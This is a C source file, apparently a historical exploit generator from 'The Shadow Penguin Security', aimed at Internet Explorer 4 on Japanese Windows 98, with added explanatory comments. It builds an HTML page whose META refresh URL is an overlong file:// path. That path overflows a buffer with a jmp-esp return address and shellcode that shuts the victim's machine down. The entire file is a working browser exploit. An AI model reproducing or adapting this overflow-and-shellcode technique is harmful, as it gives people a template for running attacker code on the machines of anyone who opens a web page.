
  1. /*=============================================================================
  2.    Microsoft IE4 for Windows98 exploit
  3.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  4.    Written by UNYUN (shadowpenguin@backsection.net)
  5.   =============================================================================
  6. */
  7.  
  8. #include    <stdio.h>
  9. #include    <windows.h>
  10.  
#define     MAXBUF          1000    /* element count of buf[] in main(); valid indices 0..MAXBUF-1 */
#define     RETADR          53      /* index in buf[] where main() stores the 4-byte address */


/* (start, end) address pairs that main() hands to search_mem() in order,
 * stopping at the 0,0 terminator pair.  These are fixed values the author
 * chose for their own IE4 / Windows98 environment; nothing in this file
 * checks that the ranges are mapped in the running process before they
 * are dereferenced. */
unsigned int mems[]={
0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,0,0};

/* Author-supplied payload bytes copied into buf[] at offset 80 by main().
 * The first 18 entries are non-zero; the 0x00 that follows is the terminator
 * main()'s strlen() call relies on.  The array is declared with 200 elements,
 * so the rest is zero-filled. */
unsigned char   exploit_code[200]={
0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
0xFF,0xD0,0x00,
};
  27.  
/*
 * Scan the byte range [st, ed) for the first occurrence of the two-byte
 * sequence c1 c2 whose address, truncated to unsigned int, contains no
 * zero byte in any of its four 8-bit positions.
 *
 * Returns that truncated address, or 0 when no qualifying match exists.
 * The fp parameter is accepted for interface compatibility but never used.
 * Note: the second-byte comparison reads cur[1], which touches the byte at
 * ed when cur == ed - 1; the caller must make that byte readable.
 */
unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char *cur = st;

    (void)fp;
    while (cur < ed) {
        if (cur[0] == c1 && cur[1] == c2) {
            unsigned int candidate = (unsigned int)cur;
            int has_zero_byte = 0;

            /* Reject any address with a 0x00 byte in it. */
            for (int shift = 0; shift < 32; shift += 8) {
                if (((candidate >> shift) & 0xff) == 0) {
                    has_zero_byte = 1;
                    break;
                }
            }
            if (!has_zero_byte) {
                return candidate;
            }
        }
        cur++;
    }
    return 0;
}
  46.  
  47.  
/*
 * Entry point.  Writes an HTML file to argv[1] whose <META> refresh URL is a
 * long file:// path built from buf[]: 0x41 fill, a 4-byte address at RETADR,
 * and the exploit_code bytes at offset 80.
 *
 * Returns FALSE (from <windows.h>) both when fopen() fails and on success;
 * the usage error and the "no jmp code" case call exit(1) instead.  Declared
 * with no return type (implicit int).  exit/memset/memcpy/strlen are used
 * without including <stdlib.h>/<string.h> directly, so this relies on
 * <windows.h> pulling them in.
 */
main(int argc,char *argv[])
{
    FILE                    *fp;
    unsigned int            i,ip;
    unsigned char           buf[MAXBUF];    /* valid indices are 0..MAXBUF-1 */

    if (argc<2){
        printf("usage %s output_htmlfile\n",argv[0]);
        exit(1);
    }
    if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;   
    fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
    /* Walk mems[] as (start,end) pairs until the 0 terminator, taking the
     * first 0xff,0xe4 byte pair (what the message below calls "jmp code")
     * whose address has no zero byte.  search_mem() dereferences these
     * hard-coded addresses inside this process, so it only succeeds where
     * they happen to be mapped and will generally fault elsewhere.  fp is
     * passed through but search_mem() never uses it. */
    for (i=0;;i+=2){
        if (mems[i]==0){
            printf("Can not find jmp code.\n");
            exit(1);
        }
        if ((ip=search_mem(fp,(unsigned char *)mems[i],
            (unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
    }
    printf("Jumping address : %x\n",ip);
    memset(buf,0x41,MAXBUF);
    
    /* Little-endian copy of ip into buf[RETADR..RETADR+3], preceded by 0x90. */
    buf[RETADR-1]=0x90;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;

    /* strlen() is called on an unsigned char * without a cast; it stops at the
     * 0x00 that ends exploit_code, so 18 bytes are copied. */
    memcpy(buf+80,exploit_code,strlen(exploit_code));
    /* BUG: buf has MAXBUF elements, so buf[MAXBUF] is one past the end and
     * this store is undefined behaviour.  The "%s" below depends on that
     * out-of-bounds terminator to stop after MAXBUF bytes. */
    buf[MAXBUF]=0;
    fprintf(fp,"%s/\">\n<HTML><B>",buf);
    fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>");
    fprintf(fp,"If you are using IE4 for Japanese Windows98, ");
    fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>");
    fprintf(fp,"</HTML>\n");
    fclose(fp);    /* return value not checked, so a failed flush goes unreported */
    printf("%s created.\n",argv[1]);
    return FALSE;
}